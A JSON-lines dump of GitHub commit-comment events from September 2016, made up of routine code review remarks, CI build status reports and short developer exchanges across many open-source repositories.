{"id":"4511247919","type":"CommitCommentEvent","actor":{"login":"bingbing8"},"repo":{"name":"PowerShell/PowerShell"},"payload":{"comment":{"id":18888065,"position":null,"line":null,"path":null,"commit_id":"0bad74b790b85098a7b4575147cd6ae0ab010e12","created_at":"2016-09-03T00:01:35Z","updated_at":"2016-09-03T00:01:35Z","body":"I don't quite understand. Currently what we tested is stored in strings. do you mean generate a file with different line ending in code?"}},"created_at":"2016-09-03T00:01:35Z"}
{"id":"4511248825","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18888068,"position":8,"line":165,"path":"src/opencl/krb5pa-md5_kernel.cl","commit_id":"b755050c8a8f7777655d1a9d817400cadd407414","created_at":"2016-09-03T00:02:04Z","updated_at":"2016-09-03T00:02:04Z","body":"Besides, if Atom had answered [this question](https://hashcat.net/forum/thread-3665-post-21004.html#pid21004) back in the days they were closed source, I would likely have give him \"more\" credit."}},"created_at":"2016-09-03T00:02:04Z"}
{"id":"4511249793","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888070,"position":35,"line":49,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:02:31Z","updated_at":"2016-09-03T00:02:31Z","body":"No need to escape the forward slash here or on lines 54 and 56 because the regex is being created via a string, not the /pattern/ syntax"}},"created_at":"2016-09-03T00:02:31Z"}
{"id":"4511250062","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888072,"position":28,"line":43,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:02:37Z","updated_at":"2016-09-03T00:02:37Z","body":"Seems like \"associative array\" is the best term to use in JavaScript"}},"created_at":"2016-09-03T00:02:37Z"}
{"id":"4511250611","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888073,"position":83,"line":80,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:02:53Z","updated_at":"2016-09-03T00:02:53Z","body":"Notice the replacements, specifically those for braces and backslashes, are performed before the `\\end{document}` command and front matter are joined with the text block."}},"created_at":"2016-09-03T00:02:53Z"}
{"id":"4511253103","type":"CommitCommentEvent","actor":{"login":"GusCaplan"},"repo":{"name":"GusCaplan/googlebot"},"payload":{"comment":{"id":18888082,"position":8,"line":8,"path":"spawner.js","commit_id":"0b19d3d43ca549e4d70b0a03fabc853b651aee0b","created_at":"2016-09-03T00:04:09Z","updated_at":"2016-09-03T00:04:09Z","body":"dammit, i did it again!"}},"created_at":"2016-09-03T00:04:09Z"}
{"id":"4511254019","type":"CommitCommentEvent","actor":{"login":"rachaelshaw"},"repo":{"name":"balderdashy/sails-docs"},"payload":{"comment":{"id":18888085,"position":null,"line":null,"path":null,"commit_id":"b3e2f4243605a3871eec1597fa462c475c5109b8","created_at":"2016-09-03T00:04:35Z","updated_at":"2016-09-03T00:04:35Z","body":"re: https://github.com/balderdashy/sails-docs/pull/747"}},"created_at":"2016-09-03T00:04:35Z"}
{"id":"4511254550","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18888089,"position":8,"line":165,"path":"src/opencl/krb5pa-md5_kernel.cl","commit_id":"b755050c8a8f7777655d1a9d817400cadd407414","created_at":"2016-09-03T00:04:52Z","updated_at":"2016-09-03T00:04:52Z","body":"Here's the little clue I got from Hashcat's source 😄 \r\n```c\r\ntypedef struct\r\n{\r\n  u8 S[256];\r\n\r\n  u32 wtf_its_faster;\r\n\r\n} RC4_KEY;\r\n```"}},"created_at":"2016-09-03T00:04:52Z"}
{"id":"4511254989","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18888092,"position":325,"line":7005,"path":"src/nvim/eval.c","commit_id":"8fb7273ac0b981eeb9afdc82675b908c1600d34f","created_at":"2016-09-03T00:05:05Z","updated_at":"2016-09-03T00:05:05Z","body":"@piotrpalek Thanks, but it exists on master: https://github.com/neovim/neovim/blob/0253766b5d812209320a14c093990e3b417510f9/src/nvim/eval.lua#L326\r\n\r\nand `:echo wordcount()` works as expected."}},"created_at":"2016-09-03T00:05:05Z"}
{"id":"4511256515","type":"CommitCommentEvent","actor":{"login":"jaraco"},"repo":{"name":"cherrypy/cherrypy"},"payload":{"comment":{"id":18888097,"position":27,"line":27,"path":"sphinx/source/install.rst","commit_id":"50efcdcafe8221b80812f36bfacb6e86a1325cc0","created_at":"2016-09-03T00:05:49Z","updated_at":"2016-09-03T00:05:49Z","body":"I mentioned elsewhere that the details in setup.py are authoritative. Perhaps the docs should just reference those values."}},"created_at":"2016-09-03T00:05:49Z"}
{"id":"4511267083","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888114,"position":7,"line":33,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:11:08Z","updated_at":"2016-09-03T00:11:08Z","body":"shouldn't have `var`"}},"created_at":"2016-09-03T00:11:08Z"}
{"id":"4511267573","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888115,"position":70,"line":67,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:11:21Z","updated_at":"2016-09-03T00:11:21Z","body":"New single-quote regex (again)!\r\n\r\n"}},"created_at":"2016-09-03T00:11:21Z"}
{"id":"4511274863","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18888136,"position":null,"line":null,"path":null,"commit_id":"fea7b30e1ab3323415329e7e42692d477c0a5af2","created_at":"2016-09-03T00:15:10Z","updated_at":"2016-09-03T00:15:10Z","body":"Sorry, forgot (again): (cherry picked from 5824b9c0e74ef585ab75ba2174c8e3108bfd2909)"}},"created_at":"2016-09-03T00:15:10Z"}
{"id":"4511276248","type":"CommitCommentEvent","actor":{"login":"chenchuanjin"},"repo":{"name":"chenchuanjin/chenchuanjin.github.io"},"payload":{"comment":{"id":18888143,"position":null,"line":null,"path":null,"commit_id":"5beb4314b2b4a27c479f60dc6d733615e114dd4d","created_at":"2016-09-03T00:15:52Z","updated_at":"2016-09-03T00:15:52Z","body":"new"}},"created_at":"2016-09-03T00:15:52Z"}
{"id":"4511276326","type":"CommitCommentEvent","actor":{"login":"ren3g4de"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18888144,"position":null,"line":null,"path":null,"commit_id":"814bd7afb5bd1753cd3f9bba599382fae603d247","created_at":"2016-09-03T00:15:54Z","updated_at":"2016-09-03T00:15:54Z","body":"You know, I actually do like it old school and have been wondering if there was an #channel to lurk in."}},"created_at":"2016-09-03T00:15:54Z"}
{"id":"4511278414","type":"CommitCommentEvent","actor":{"login":"FredLunnon"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18888151,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-03T00:16:55Z","updated_at":"2016-09-03T00:16:55Z","body":"  Yup, it's rocket science.\n\n  It seems that  <xcode>  somehow manages to alter the MIME-type of a\npython source from  <text/plain>  to  <text/x-java>  , which is not a recognised\ntype according to\n    https://gist.github.com/rrobe53/976610\n\n  Evidently I have to find another editor which does not crash all the time or\ncunningly corrupt my files ---  <Atom>  looks to be a good bet, at least for\nGitHub-related purposes.\n\n  But I still don't know how to repair my existing banjaxed source files.\n\nWFL\n\n\n\nOn 9/1/16, Fred Lunnon <fred.lunnon@gmail.com> wrote:\n>   I opened my local  <__init.py__>   in  <textedit>  then re-saved and\n> pushed\n> to my repo.  Tellingly, the repo now displays it in a different font.\n>\n>   Try pulling again, and see what happens; if still kaput, I'll try\n> editing directly\n> into the repo, as suggested.  [ It's not rocket science.  Or is it? ]\n>\n>   Re  <issues>  ---  ahah, so I have to try that in the upstream repo.\n> Willco.\n>\n> WFL\n>\n>\n>\n>\n>\n> On 9/1/16, Mike Boyle <notifications@github.com> wrote:\n>> Fred, this result isn't typical.  I've never seen anything like this,\n>> even\n>> when using Xcode myself.  If you look at [your own copy of the\n>> repository](https://github.com/FredLunnon/clifford), you can click on the\n>> \"Latest commit\" to see the [changes that you\n>> made](https://github.com/FredLunnon/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5).\n>>  Github shows that it's just some weird binary file, which is not what\n>> `__init__.py` should be; it should just be a plain text file.  So Xcode\n>> must\n>> be screwing something up for you.  Maybe it would be easier to edit\n>> directly\n>> on github.com.\n>>\n>> Also, I think arsenovic is saying that it's better to report bugs by\n>> clicking on [\"Issues\"](https://github.com/arsenovic/clifford/issues) in\n>> *his* copy of the repository, clicking the \"New issue\" button, and\n>> writing\n>> your bug report there.  Usually, it's one issue for each bug, but if\n>> they're\n>> small or closely related you might combine them into a single issue.\n>>\n>> Github and git are actually really great tools, if you just put in a\n>> little\n>> bit of time learning how to use them.  I know that it's easy to go wrong.\n>> (E.g., I think Brombo's main problem is that he simply doesn't `git pull`\n>> new pull requests to his own repo before he starts in on new edits, or\n>> `git\n>> push` before he merges a new pull request.)  And once you've gone wrong,\n>> it's not obvious how to straighten out.  But if you follow the\n>> directions,\n>> these tools really are simple.  There are lots of tutorials (including\n>> videos) if you google for them.\n>>\n>> --\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly or view it on GitHub:\n>> https://github.com/arsenovic/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5#commitcomment-18865464\n>\n"}},"created_at":"2016-09-03T00:16:55Z"}
{"id":"4511283574","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888161,"position":31,"line":46,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:19:41Z","updated_at":"2016-09-03T00:19:41Z","body":"Won't be found on line 76, `\"\\\\\\\\\" != \"\\\\\"`. The four backslashes are for escaping the javascript string and regex character. But when it matches and looks up \"\\\\\" in this dictionary, it will not be found."}},"created_at":"2016-09-03T00:19:41Z"}
{"id":"4511283858","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"oddcoder/radare2"},"payload":{"comment":{"id":18888164,"position":5,"line":61,"path":"libr/core/anal_tp.c","commit_id":"e78372d282e72d43b47568d1ea2dc8d817f15833","created_at":"2016-09-03T00:19:49Z","updated_at":"2016-09-03T00:19:49Z","body":"Missing space before ("}},"created_at":"2016-09-03T00:19:49Z"}
{"id":"4511294900","type":"CommitCommentEvent","actor":{"login":"hvp004"},"repo":{"name":"hvp004/mitch.giithub.io"},"payload":{"comment":{"id":18888185,"position":null,"line":null,"path":null,"commit_id":"9142c217d83943cb0d47b7da054e796bf41cdc15","created_at":"2016-09-03T00:25:55Z","updated_at":"2016-09-03T00:25:55Z","body":"v1"}},"created_at":"2016-09-03T00:25:55Z"}
{"id":"4511295140","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18888186,"position":null,"line":null,"path":null,"commit_id":"db0212902c12cd40e277e6d9f208a0a43e1ecfeb","created_at":"2016-09-03T00:26:04Z","updated_at":"2016-09-03T00:26:04Z","body":"嗯对"}},"created_at":"2016-09-03T00:26:04Z"}
{"id":"4511296728","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888189,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-03T00:27:00Z","updated_at":"2016-09-03T00:27:00Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1187 of 1187 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-03T00:27:00Z"}
{"id":"4511297166","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":18888191,"position":2,"line":2,"path":"extra-network/ufw/autobuild/overrides/usr/lib/systemd/system/ufw.service","commit_id":"d1d5c5c93b0bd61280455dada1e99579f1b495ce","created_at":"2016-09-03T00:27:15Z","updated_at":"2016-09-03T00:27:15Z","body":"Got it."}},"created_at":"2016-09-03T00:27:15Z"}
{"id":"4511298127","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888195,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-03T00:27:50Z","updated_at":"2016-09-03T00:27:50Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-03T00:27:50Z"}
{"id":"4511303566","type":"CommitCommentEvent","actor":{"login":"yxqd"},"repo":{"name":"mcvine/mcvine"},"payload":{"comment":{"id":18888207,"position":null,"line":null,"path":null,"commit_id":"f6ba95af0a6e3993cd1331b9fe6be6f823219d25","created_at":"2016-09-03T00:31:06Z","updated_at":"2016-09-03T00:31:06Z","body":"Typo: should be #161"}},"created_at":"2016-09-03T00:31:06Z"}
{"id":"4511303777","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18888209,"position":null,"line":null,"path":null,"commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-03T00:31:12Z","updated_at":"2016-09-03T00:31:12Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-03T00:31:12Z"}
{"id":"4511313127","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18888218,"position":null,"line":null,"path":null,"commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-03T00:36:31Z","updated_at":"2016-09-03T00:36:31Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-03T00:36:31Z"}
{"id":"4511315362","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18888221,"position":null,"line":null,"path":null,"commit_id":"fdd1b1c072bb0743f7611cc6d61ffc2ab9f95552","created_at":"2016-09-03T00:37:57Z","updated_at":"2016-09-03T00:37:57Z","body":"@Simn @ncannasse It was quite challenging for me to figure out how this function works, so I decided to document my observations, please review if it's correct! :-)"}},"created_at":"2016-09-03T00:37:57Z"}
{"id":"4511316326","type":"CommitCommentEvent","actor":{"login":"phraust1612"},"repo":{"name":"phraust1612/ProjectDeepLearning"},"payload":{"comment":{"id":18888223,"position":null,"line":null,"path":null,"commit_id":"534d97b2b00ab090ae95811de33b43d8bbb18492","created_at":"2016-09-03T00:38:33Z","updated_at":"2016-09-03T00:38:33Z","body":"checkAccuracy function doesn't occur an error for CNN"}},"created_at":"2016-09-03T00:38:33Z"}
{"id":"4511317628","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18888229,"position":null,"line":null,"path":null,"commit_id":"608b13498ef71d7ae0d00eab39f4b3290e878585","created_at":"2016-09-03T00:39:21Z","updated_at":"2016-09-03T00:39:21Z","body":"Something is wrong with the SPSA values you have used KnightValueMg,12779040,0,25558080,1.2779e+006,0.0020\r\nRookValueMg,17175440,0,34350880,1.71754e+006,0.0020\r\n\r\nFor example, the 2nd parameter is the initial value. For the Knight it should be 753, \r\nnot 12779040 !\r\n\r\nSo something was wrong in your code.\r\n\r\nLooking at your code, you have 2 instructions \r\nTUNE(PawnValueMg, KnightValueMg, BishopValueMg, RookValueMg, QueenValueMg, PSQT::init);\r\nThere is one in psqt.cpp, and another one in type.h\r\n\r\nYou should have it only in one place, for sure.\r\n\r\nPlease cancel this test, and give me a few minutes, I will try to help.\r\n\r\n\r\n"}},"created_at":"2016-09-03T00:39:21Z"}
{"id":"4511317938","type":"CommitCommentEvent","actor":{"login":"phraust1612"},"repo":{"name":"phraust1612/ProjectDeepLearning"},"payload":{"comment":{"id":18888232,"position":null,"line":null,"path":null,"commit_id":"b52a285f23473f4b5d96ec9933a9fdfc5e53c01c","created_at":"2016-09-03T00:39:32Z","updated_at":"2016-09-03T00:39:32Z","body":"CheckAccuracy function doesn't occur an error for the case of CNN"}},"created_at":"2016-09-03T00:39:32Z"}
{"id":"4511322455","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18888242,"position":null,"line":null,"path":null,"commit_id":"a30fbf36098b52b711e8cf49f907c2fed561e687","created_at":"2016-09-03T00:42:16Z","updated_at":"2016-09-03T00:42:16Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 16](http://teamcity.otenv.com/viewLog.html?buildId=5162613&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-03T00:42:16Z"}
{"id":"4511323120","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888243,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-03T00:42:36Z","updated_at":"2016-09-03T00:42:36Z","body":"AddLoggingToInstaller (JasonGlazer) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-03T00:42:36Z"}
{"id":"4511323630","type":"CommitCommentEvent","actor":{"login":"pswamikr"},"repo":{"name":"ibmdb/node-ibm_db"},"payload":{"comment":{"id":18888244,"position":null,"line":null,"path":null,"commit_id":"d5fc49a15b6864b8b454fa7720294a93b8e0b924","created_at":"2016-09-03T00:42:53Z","updated_at":"2016-09-03T00:42:53Z","body":"It is a perfect timing, I was looking for options to call stored procedures with INPUT AND OUTPUT. I did npm install ibm_db but I don't see your changes .much appreciate if you can let know what need to change to get your latest changes. "}},"created_at":"2016-09-03T00:42:53Z"}
{"id":"4511325060","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18888247,"position":null,"line":null,"path":null,"commit_id":"a30fbf36098b52b711e8cf49f907c2fed561e687","created_at":"2016-09-03T00:43:47Z","updated_at":"2016-09-03T00:43:47Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 16](http://teamcity.otenv.com/viewLog.html?buildId=5162613&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:31"}},"created_at":"2016-09-03T00:43:47Z"}
{"id":"4511325389","type":"CommitCommentEvent","actor":{"login":"ling7334"},"repo":{"name":"ling7334/Novel-crawler"},"payload":{"comment":{"id":18888248,"position":6,"line":12,"path":"usrlib.py","commit_id":"6e127388d479e9619d3f233e3e27feedca90a7b3","created_at":"2016-09-03T00:44:00Z","updated_at":"2016-09-03T00:44:00Z","body":"可以修改为任意浏览器\r\n\r\n竟然天真的以为过滤User-Agent就能防爬虫"}},"created_at":"2016-09-03T00:44:00Z"}
{"id":"4511326038","type":"CommitCommentEvent","actor":{"login":"chenleixu"},"repo":{"name":"chenleixu/first-pr"},"payload":{"comment":{"id":18888249,"position":null,"line":null,"path":null,"commit_id":"b774fdb5ced9bc462bf789f15b87580d6c2c8a2f","created_at":"2016-09-03T00:44:24Z","updated_at":"2016-09-03T00:44:24Z","body":"#!/bin/bash\r\necho \"This is th first project on github\""}},"created_at":"2016-09-03T00:44:24Z"}
{"id":"4511326337","type":"CommitCommentEvent","actor":{"login":"chenleixu"},"repo":{"name":"chenleixu/first-pr"},"payload":{"comment":{"id":18888251,"position":null,"line":null,"path":null,"commit_id":"b774fdb5ced9bc462bf789f15b87580d6c2c8a2f","created_at":"2016-09-03T00:44:37Z","updated_at":"2016-09-03T00:44:37Z","body":"init version"}},"created_at":"2016-09-03T00:44:37Z"}
{"id":"4511327471","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18888253,"position":null,"line":null,"path":null,"commit_id":"701366be4389cde90dd25b10410d000820e8ed54","created_at":"2016-09-03T00:45:18Z","updated_at":"2016-09-03T00:45:18Z","body":"Very insightful comment!  I may rewrite accordingly."}},"created_at":"2016-09-03T00:45:18Z"}
{"id":"4511327914","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18888254,"position":null,"line":null,"path":null,"commit_id":"d82716d22043643f6560f681f297118eda2b33c5","created_at":"2016-09-03T00:45:36Z","updated_at":"2016-09-03T00:45:36Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 17](http://teamcity.otenv.com/viewLog.html?buildId=5162624&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-03T00:45:36Z"}
{"id":"4511329659","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18888259,"position":null,"line":null,"path":null,"commit_id":"d82716d22043643f6560f681f297118eda2b33c5","created_at":"2016-09-03T00:46:40Z","updated_at":"2016-09-03T00:46:40Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 17](http://teamcity.otenv.com/viewLog.html?buildId=5162624&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:04"}},"created_at":"2016-09-03T00:46:40Z"}
{"id":"4511329712","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18888260,"position":null,"line":null,"path":null,"commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-03T00:46:42Z","updated_at":"2016-09-03T00:46:42Z","body":"os_2_0_no_apppathhelpers (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-03T00:46:42Z"}
{"id":"4511332907","type":"CommitCommentEvent","actor":{"login":"nealjack"},"repo":{"name":"lab11/signpost"},"payload":{"comment":{"id":18888271,"position":null,"line":null,"path":null,"commit_id":"7061a51c84236ff771784b2d31a46867bc1dcefd","created_at":"2016-09-03T00:48:47Z","updated_at":"2016-09-03T00:48:47Z","body":"@ppannuto We should have a PDF of the schematic/board."}},"created_at":"2016-09-03T00:48:47Z"}
{"id":"4511334080","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18888276,"position":null,"line":null,"path":null,"commit_id":"df35b9901103837bebee6d4ff0f9287a6a592cae","created_at":"2016-09-03T00:49:30Z","updated_at":"2016-09-03T00:49:30Z","body":"os_2_0_no_apppathhelpers (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-df35b9901103837bebee6d4ff0f9287a6a592cae-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-03T00:49:30Z"}
{"id":"4511334095","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18888277,"position":null,"line":null,"path":null,"commit_id":"b3f4973b2543d8cc947203cc82c0122cd45c06c7","created_at":"2016-09-03T00:49:31Z","updated_at":"2016-09-03T00:49:31Z","body":"@Shougo \r\nHave you tested it?\r\n\r\nHow it it supposed to work?\r\n\r\nFor the debugger to work it needs to be attached to a tty,  right?"}},"created_at":"2016-09-03T00:49:31Z"}
{"id":"4511335597","type":"CommitCommentEvent","actor":{"login":"chaoskagami"},"repo":{"name":"chaoskagami/corbenik"},"payload":{"comment":{"id":18888280,"position":null,"line":null,"path":null,"commit_id":"709a33d87f3a6597dca1942cfd93e672b3937b0e","created_at":"2016-09-03T00:50:24Z","updated_at":"2016-09-03T00:50:24Z","body":"Ah right, almost forgot about that."}},"created_at":"2016-09-03T00:50:24Z"}
{"id":"4511342267","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18888294,"position":72,"line":69,"path":"ficbot.js","commit_id":"ea8208c8ea1521fec466987d3eda76ab5e3a8f11","created_at":"2016-09-03T00:54:44Z","updated_at":"2016-09-03T00:54:44Z","body":"Should be a single backslash as this is an escape sequence for the intended character"}},"created_at":"2016-09-03T00:54:44Z"}
{"id":"4511343846","type":"CommitCommentEvent","actor":{"login":"Shougo"},"repo":{"name":"Shougo/deoplete.nvim"},"payload":{"comment":{"id":18888298,"position":null,"line":null,"path":null,"commit_id":"b3f4973b2543d8cc947203cc82c0122cd45c06c7","created_at":"2016-09-03T00:55:41Z","updated_at":"2016-09-03T00:55:41Z","body":"https://github.com/Shougo/deoplete.nvim/issues/337\r\n\r\nWhy did you create it?\r\n\r\n> For the debugger to work it needs to be attached to a tty, right?\r\n\r\nI think you have already known the method.\r\nI don't know."}},"created_at":"2016-09-03T00:55:41Z"}
